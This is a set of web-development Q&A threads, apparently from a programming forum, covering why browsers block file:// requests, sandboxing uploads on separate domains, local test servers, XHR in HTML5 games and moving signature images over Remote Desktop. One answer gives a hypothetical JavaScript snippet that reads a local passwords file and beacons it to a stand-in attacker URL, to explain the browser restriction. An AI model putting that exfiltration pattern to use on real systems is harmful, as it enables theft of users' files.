Why can't a local page like
file:///C:/index.html
send a request for a resource like
file:///C:/data.json
This is prevented because it's a cross-origin request, but in what way is it cross-origin? I don't understand why this is a vulnerability and why it's prevented. It just seems like a massive pain when I want to whip up a quick utility for something in JavaScript/HTML and I can't run it without uploading it to a server somewhere, because of this seemingly arbitrary restriction.
HTML files are expected to be "safe". Tricking people into saving an HTML document to their hard drive and then opening it is not difficult ("Here, just open the HTML file attached to this email" would cause many email clients to automatically save it to a tmp directory and open it in the default application).
If JavaScript in that file had permission to read any file on the disk, then users would be extremely vulnerable.
It's the same reason that software like Microsoft Word prompts before allowing macros to run.
It protects you from malicious HTML files reading from your hard drive.
On a real server, you are (hopefully) not serving arbitrary files, but on your local machine, you could very easily trick users into loading whatever you want.
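To make the risk concrete, here is a sketch of what a saved malicious HTML file could do if file:// pages were allowed to read arbitrary local files. The path and attacker URL are made up for illustration; browsers block exactly this:

    // Hypothetical: only works if the browser allowed file:// reads.
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'file:///C:/Users/victim/Documents/passwords.txt'); // made-up victim path
    xhr.onload = function () {
        // Exfiltrate the stolen contents to an attacker-controlled server (made-up URL)
        navigator.sendBeacon('https://attacker.example/collect', xhr.responseText);
    };
    xhr.send();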
Browsers are set up with security measures to make sure that ordinary users won't be at increased risk. Imagine that I'm a malicious website and I have you download something to your filesystem that looks, to you, like a regular website. Imagine that downloaded HTML can access other parts of your file system and then send that data to me through AJAX or perhaps another piece of executable code on the filesystem that came with this package. To a regular user this might look like a regular website that just "opened up a little weird but I still got it to work." If the browser prevents that, they're safer.
It's possible to relax this restriction with a flag (as in: How to launch HTML using Chrome in "--allow-file-access-from-files" mode?), but that's more for knowledgeable users ("power users"), and it probably comes with some kind of warning about how your browsing session isn't secure.
For the kind of scenarios you're talking about, you should be able to spin up a local HTTP server of some sort, perhaps using Python, Ruby, or node.js (I imagine node.js would be an attractive option for testing JavaScript-based apps).
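For example, a minimal static file server in node.js might look like the sketch below. It assumes your files live in the directory you run it from, and it does no path sanitisation, so treat it as local-testing-only. (Python offers a similar one-liner with its built-in http.server module.)

    // Save as server.js, run with: node server.js
    // then open http://localhost:8080/index.html
    var http = require('http');
    var fs = require('fs');
    var path = require('path');

    http.createServer(function (req, res) {
        var file = path.join(__dirname, req.url === '/' ? 'index.html' : req.url);
        fs.readFile(file, function (err, data) {
            if (err) { res.writeHead(404); res.end('Not found'); return; }
            res.writeHead(200);
            res.end(data);
        });
    }).listen(8080);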
The Mozilla Developer Network recommends sandboxing uploaded files to a different subdomain:
Sandbox uploaded files (store them on a different server and allow access to the file only through a different subdomain or even better through a fully different domain name).
I don't understand what additional security this would provide; my approach has been to upload files on the same domain as the web page with the <input> form control, restrict uploaded files to a particular directory and perform antivirus scans on them, and then allow access to them on the same domain they were uploaded to.
There are practical/performance reasons and security reasons.
From a practical/performance standpoint: unless you are on a budget, store your files on a system optimised for performance. This can be any type of CDN if you are serving them once uploaded, or just isolated upload-only servers. You can do this yourself, or better yet use something like AWS S3 and customise the permissions to your needs.
From a security point of view, it is incredibly hard to protect an uploaded file from being executable, especially if you are using a server-side scripting language. There are many methods, both in HTTP and in the most popular HTTP servers (nginx, Apache, ...), to harden things and make them secure, but there are so many things you have to take into account, and another bunch you would never even think about, that it is much safer to just keep your files somewhere else altogether, ideally where there is no scripting engine that could run script code on them.
I assume that the different subdomain or domain recommendation is about XSS, vulnerabilities exploiting bad CORS configurations, and prevention of phishing attempts (for example, someone successfully uploading content to your site that mimics your site but does something nasty, such as stealing user credentials or providing fake information; the page would still be served from your domain, and there wouldn't be an HTTPS security alert from the certificate either).
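As an illustration of the "no scripting engine" point, here is a minimal node.js sketch of serving uploaded files from a separate origin as inert downloads. The header names are real; the uploads directory, hostname, and port are assumptions:

    var http = require('http');
    var fs = require('fs');
    var path = require('path');

    // Imagine this runs on usercontent.example.com, a different origin from the main site
    http.createServer(function (req, res) {
        var file = path.join('/srv/uploads', path.basename(req.url)); // basename defeats ../ traversal
        fs.readFile(file, function (err, data) {
            if (err) { res.writeHead(404); res.end(); return; }
            res.writeHead(200, {
                'Content-Type': 'application/octet-stream',  // never let the browser render it
                'Content-Disposition': 'attachment',         // force download instead of display
                'X-Content-Type-Options': 'nosniff'          // stop MIME-sniffing it into HTML
            });
            res.end(data);
        });
    }).listen(8080);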
Found an interesting article about "cruftless" links (removing the "index.html" from links), but when I do that, no browser shows the local pages:
http://www.nimblehost.com/blog/2012/11/why-cruftless-links-are-better/
This is understandable; it's a 'file' URL from a local machine. So what do people do to work on basic HTML sites offline? How do they preview them?
For example, no browser (understandably) will display this...
file:///JOBS/ABC/About/
... but this is fine...
file:///JOBS/ABC/About/index.html
... so what do people do to get around this?
The meaning of file: URLs is, by definition, system-dependent. Normally browsers map them to files in the file system in a relatively straightforward manner.
Thus, a link with href value like file:///JOBS/ABC/About/ may or may not work, depending on system. It may fail, or it may open a generated document containing a directory (folder) listing, or it might do something else.
There is normally no need to get around this, and it is pointless to worry about SEO when dealing with local files.
This could, however, matter during site development, when you work with a site locally (and perhaps test and demonstrate it locally). Then you might wish to have, say, a link written as <a href="About/">About us</a>, so that it works locally as well as on a server, yielding About/index.html in both cases but without hard-wiring index.html into the HTML markup.
I’m afraid the answer is “you can’t”. But as a workaround, you can install and use a local HTTP server, with settings similar to those you will have on the real server. This means a little extra work (mainly downloading, installing, and configuring software like XAMPP), but it also gives you other important benefits, like testing your pages locally with server-based features (to the extent that the real server is similar to the local server).
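XAMPP is one option; if you would rather not install a full Apache/PHP stack, a small node.js sketch can reproduce the one behaviour the question needs, mapping a directory URL to its index.html (the port is arbitrary):

    var http = require('http');
    var fs = require('fs');
    var path = require('path');

    http.createServer(function (req, res) {
        var p = req.url;
        if (p.charAt(p.length - 1) === '/') p += 'index.html'; // /About/ -> /About/index.html
        fs.readFile(path.join(__dirname, p), function (err, data) {
            if (err) { res.writeHead(404); res.end('Not found'); return; }
            res.writeHead(200);
            res.end(data);
        });
    }).listen(8000);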
I am currently developing an HTML5 game which loads in an external resource. Currently, I am using XMLHttpRequest to read in the file, but this does not work in Chrome, resulting in:
XMLHttpRequest cannot load file:///E:/game/data.txt
Cross origin requests are only supported for HTTP.
The file is in the same directory as the HTML5 file.
Questions:
1) Is there any way for an HTML5 application to use XMLHttpRequest (or another method) to load an external file without requiring it to be hosted on a webserver?
2) If I package the HTML5 code as an application on a tablet/phone which supports HTML5, would XMLHttpRequest be able to load external files?
(a) Yes and no. As a matter of security-policy, XHR has traditionally been both same-protocol (ie: http://, rather than file:///), and on top of that, has traditionally been same-domain, as well (as in same subdomain -- http://pages.site.com/index can't get a file from http://scripts.site.com/). Cross-domain requests are now available, but they require a webserver, regardless, and the server hosting the file has to accept the request specifically.
(b) So in a roundabout way, the answer is yes, some implementations might (incorrectly) allow you to grab a file through XHR, even if the page is speaking in file-system terms, rather than http requests (older versions of browsers)... ...but otherwise you're going to need a webserver of one kind or another. The good news is that they're dirt-simple to install. EasyPHP would be sufficient, and it's pretty much a 3-click solution. There are countless others as well. It's just the first that comes to mind in terms of brain-off installation, if all you want is a file-server in apache, and you aren't planning on using a server-side scripting language (or if you do plan on using PHP).
XMLHttpRequest would absolutely be able to get external files...
IF they're actually external (ie: not bundled in a phone-specific cache -- use the phone's built-in file-access API for that, and write a wrapper to handle each one with the same, custom interface), AND the phone currently has reception -- be prepared to handle failure-conditions (like having a default-settings object, or having error-handling or whatever the best-case is, for whatever is missing).
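For instance, a sketch of loading data.txt over XHR with a fallback when the request fails; the defaults object and the startGame entry point are made up for illustration:

    var defaults = { level: 1, speed: 5 };   // hypothetical fallback settings

    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'data.txt', true);       // relative URL: same directory as the page
    xhr.onload = function () {
        startGame(xhr.responseText);         // assumed game entry point
    };
    xhr.onerror = function () {
        startGame(JSON.stringify(defaults)); // no reception / no server: use defaults
    };
    xhr.send();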
Also, look into Application Cache Manifests. Again, this is an html5 solution which different versions of different phones handle differently (early-days versus more standardized formats). DO NOT USE IT DURING DEVELOPMENT, AS IT MAKES TESTING CODE/CONTENT CHANGES MISERABLY SLOW AND PAINFUL, but it's useful when your product is pretty much finished and bug-free, and seconds away from launch, where you tell users' browsers to cache all of the content for eternity, so that they can play offline, and they can save all kinds of bandwidth, not having to download everything the next time they play.
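For reference, a minimal cache manifest might look like this (the file names are assumptions); the page points to it with <html manifest="game.appcache">:

    CACHE MANIFEST
    # v1 -- bump this comment to force clients to re-download everything
    index.html
    game.js
    data.txt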
I am new to web programming... I have been asked to create a simple Internet search application which would transmit to the browser some data stored remotely on the server.
Considering the client/server architecture (which I am new to), I would like to know if the "client" is represented only by the Internet browser, and therefore whether the entire code of the web application should be stored on the server. As it's a very generic question, a generic answer is also welcome.
As you note, this is a very generic and broad question. You'd be well-served by more complete requirements. Regardless:
Client/server architecture generally means that some work is done by the client, and some by the server. The client may be a custom application (such as iTunes or Outlook), or it might be a web browser. Even if it's a web browser, you typically still have some code executing client-side, Javascript usually, to do things like field validation (are all fields filled out?).
Much of the code, as you note, will be running on the server, and some of this may duplicate your client-side code. Validation, for instance, should be performed on the client-side, to improve performance (no need to communicate with the server to determine if the password meets length requirements), but should be performed on the server as well, since client-side code is easily bypassed.
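A small sketch of the client-side half, assuming a form with id "signup", a field with id "password", and an 8-character minimum (all of which are made up for illustration):

    // Client-side convenience check only; the server must repeat it,
    // because a user can disable or bypass this script entirely.
    document.getElementById('signup').addEventListener('submit', function (e) {
        var pw = document.getElementById('password').value;
        if (pw.length < 8) {
            e.preventDefault();  // stop the submit without a server round-trip
            alert('Password must be at least 8 characters.');
        }
    });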
You can either put all the code on the server and have it generate HTML to send back to the browser, or you can include JavaScript in the HTML pages so that some of the logic runs inside the browser. Many web applications mix the two techniques.
You can do this with all the code stored on the server.
1) The user will navigate to a page on your webserver using a URL you provide.
2) When the webserver gets the request for that page, instead of just returning a standard HTML file, it will run your code, perhaps some PHP, which inserts the server information, perhaps from a database, into an HTML template.
3) The resulting fully complete HTML file is sent to the client. To the client's browser, it looks like any other HTML page.
For an example of PHP that dynamically inserts information into HTML, see the following (this won't be exactly what you will do, but it will give you an idea of how PHP can work):
Code:
http://www.php-scripts.com/php_diary/example1.phps
See the result (refresh a few times to see it in action):
http://www.php-scripts.com/php_diary/example1.php3
You can see from this that the "code file" looks just like a normal HTML file, except that what is between the angled brackets is actually PHP code; in this case it puts the time into its position in the HTML file. In your case, you would write code to pull the data you want into the file.
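The same idea in node.js, for comparison (a sketch, not the linked script): the server builds the HTML on each request, and the browser only ever sees the finished page:

    var http = require('http');

    http.createServer(function (req, res) {
        // In your case, this string would be filled from a database query instead
        var html = '<html><body><p>The time is ' +
                   new Date().toLocaleTimeString() +
                   '</p></body></html>';
        res.writeHead(200, { 'Content-Type': 'text/html' });
        res.end(html);
    }).listen(8080);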
I have an application that people use through Remote Desktop/Terminal Server. The application supports digital signatures. Well, the digital signature pad is on the client, but the program runs on the server. The signature pad also does not support being shared as a device through Remote Desktop (it is not listed with "Supported Plug And Play Devices" in local resources).
What is the best way of being able to send the signature to the server from the client machine? Preferably with the least amount of setup for the users (there are a lot of clients and a fair number of servers this must be done for).
My best idea so far is sharing the clipboard and using it to send messages from server to client (with the client application "polling" the clipboard for a special clipboard format). I feel like this may not be very fast or stable, though, as I don't think Remote Desktop was designed for it.
Also, we are open to [reasonable] language choices like C/C++, C#, Delphi (the application is written in this), etc. Also, the signature pad is a Topaz TS460 (it connects by USB).
Can anyone give me ideas on how this can be done or if the clipboard idea of mine is probably the best?
tl;dr: What is the best way of sending an image from a client to a server through remote desktop?
Update:
Well, I've done a bit of testing with plain ASCII text (I can't get files to transfer) and it seems that there are problems copying large amounts of text. I tried copying 43M of text, and after a long period of waiting I just got an empty clipboard (like it did a paste, but no text was pasted). I was able to transfer about 2M of data, though (at decent speeds), between server and client, so this may be feasible for signature images (which will be either JPEG or PNG compressed).
Have you looked into using Remote Desktop Virtual Channels? http://msdn.microsoft.com/en-us/library/aa383509(VS.85).aspx
For a Topaz signature pad and credit card swiper, you will need the serial type. It will work; I have already tried it. But I guess this question is too old for me to answer. Do iPads, as well as other tablets, work on terminal and Citrix setups?
I have not tried with Remote Desktop, but one thing that comes to mind is installing a good macro tool on the client. AutoHotKey ( http://www.autohotkey.com/ ) is a free tool that lets you create runable scripts that can do things like open applications and send key strokes to them.
I'm not sure how well it would work with remote desktop, but I know for certain that you can easily setup a script that would launch an application, send it "key strokes" to generate data, copy the data to the clipboard, switch to another application and then paste in the data.
When AutoHotKey is installed, you have the option of associating the scripts' file types with the app, so that end users can just double-click your script's desktop icon to run it. No command-line messiness for them.
If all you need to do is transfer an amount of data (a file) from the client to the server, it is fairly easy. Polling for a file also seems more logical than polling via the clipboard.
When connecting, the client should enable sharing a hard disk (at least one). You can specify the options every time you connect, or you can send the client a preconfigured .RDP file.
If you can get the user to put the file in a fixed location, you can access a file such as C:\Shared\File.jpg using a path like \\tsclient\c\Shared\File.jpg.
Here's an explanation (with nice screenshot) how to copy files with Remote Desktop:
http://www.jakeludington.com/ask_jake/20051218_copying_files_with_remote_desktop.html
I wasn't sure whether your question already rules out this approach or not.